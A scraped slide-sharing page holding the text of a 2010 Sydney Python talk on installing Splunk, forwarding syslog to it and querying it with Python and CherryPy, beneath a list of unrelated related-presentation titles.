EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 

Sydney Python Presentation (October 2010) - Splunk

  • 1. Splunk and Python Sydney Python October 2010 Kelvin Nicholson
  • 2. What is Splunk? “Splunk is the world’s leading software used to monitor, report and analyze live streaming IT data as well as terabytes of historical data – located on-premises or in the cloud.” -Splunk.com “Splunk is like google for log files.” -Kelvin
  • 3. Installing Splunk (on Ubuntu) $ sudo dpkg -i splunk-4.1.5-85165-linux-2.6-intel.deb $ sudo splunk enable boot-start $ sudo /etc/init.d/splunk start
  • 5. Configuring Splunk ● Configure Splunk to allow syslog traffic ● Configure devices to send syslog to Splunk ○ Linux (syslog-ng) destination loghost { udp("192.168.83.11" port (514)); }; log { source(s_all); destination(splunk); }; ● Cisco IOS no logging console no logging monitor logging 192.168.83.11 ● OSSEC <syslog_output> <server>192.168.83.11 </server> <port>8514</port> </syslog_output>
  • 7. Why I Like Splunk (Abridged) ● Dashboards of Search terms ■ Security alerts “login failed for” ■ STP network issues (“LEARNING AND FORWARDING” ■ Duplex mismatches ■ Wildcard searches, e.g. “-server2k3-” ● My “WTF” filter (easy filter building) ● Beautiful trending (“cold start” AND “switch01”)
  • 9. Extending Splunk with Python ● REST API. (Search only) ● Custom search command. (iplocation) ● Configuring scripted alerts. (tweet X alert) ● Directly to backend using Splunk's built-in modules. (Full module access)
  • 10. Accessing Splunk Datastore kelvinn@splunk:/opt/splunk/bin$ ./splunk cmd python >>> import splunk.auth, splunk.search >>> key = splunk.auth.getSessionKey('admin','changeme') >>> my_job = splunk.search.dispatch('search sypy', namespace='search') >>> event_list = [] >>> for event in my_job.events: ... event_list.append(event.fields) ... >>> [{'_si':event_list print splunk,main, 'index': main, 'sourcetype': syslog, 'source': udp:514, '_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:40:37+1100, 'host': 192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:40:37 192.168.83.5 Oct 6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well., '_serial': 0, '_cd': 0:275}, {'_si': splunk,main, 'index': main, 'sourcetype': syslog, 'source': udp:514, '_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:39: 33+1100, 'host': 192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:39:33 192.168.83.5 Oct 6 19:39:34 mini kelvinn: sypy, '_serial': 1, '_cd': 0:251}] >>> event_list[0]['_raw'] Oct 6 19:40:37 192.168.83.5 Oct 6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well.
  • 11. Splunk Architecture CherryPy built-in, sweet. What can we do with that?
  • 12. Built-in CherryPy Fun kelvinn@splunk:/opt$ cat splunktest.py import cherrypy import splunk.auth, splunk.search def get_splunk_data(): key = splunk.auth.getSessionKey('admin','changeme') # replace with your credentials my_job = splunk.search.dispatch('search sypy', namespace='search', earliest_time='-24h') event_list = [] for event in my_job.events: event_list.append(event.raw) return event_list class HelloWorld: def index(self): splunk_list = get_splunk_data() return str(splunk_list) index.exposed = True cherrypy.config.update({'server.socket_host': '0.0.0.0', 'server.socket_port': 9999, }) kelvinn@splunk:/opt$ /opt/splunk/bin/splunk cmd python /opt/splunktest. cherrypy.quickstart(HelloWorld()) py I'm not a CherryPy expert, but it looks pretty P.S.
  • 14. Resources + Thanks Splunk introduction: http://www.splunk.com/base/Documentation/4.1.5/Installation/Splunksarchitectureandwhatgetsinstalled Splunk REST Search (with Python httplib example): http://www.splunk.com/base/Documentation/4.1.5/Developer/RESTCreateSearch Custom search command (iplocation): http://www.splunk.com/base/Documentation/latest/SearchReference/Customsearchiplocation How to write custom alerts: http://www.splunk.com/base/Documentation/4.1.5/Admin/Configurescriptedalerts Using Splunk's built-in Python modules: http://answers.splunk.com/questions/14/can-i-use-splunks-built-in-python-sdk-in-my-own-scripts Some information about Splunk's Python SDK: http://www.splunk.com/base/Documentation/4.1.5/Developer/PySDK Thanks .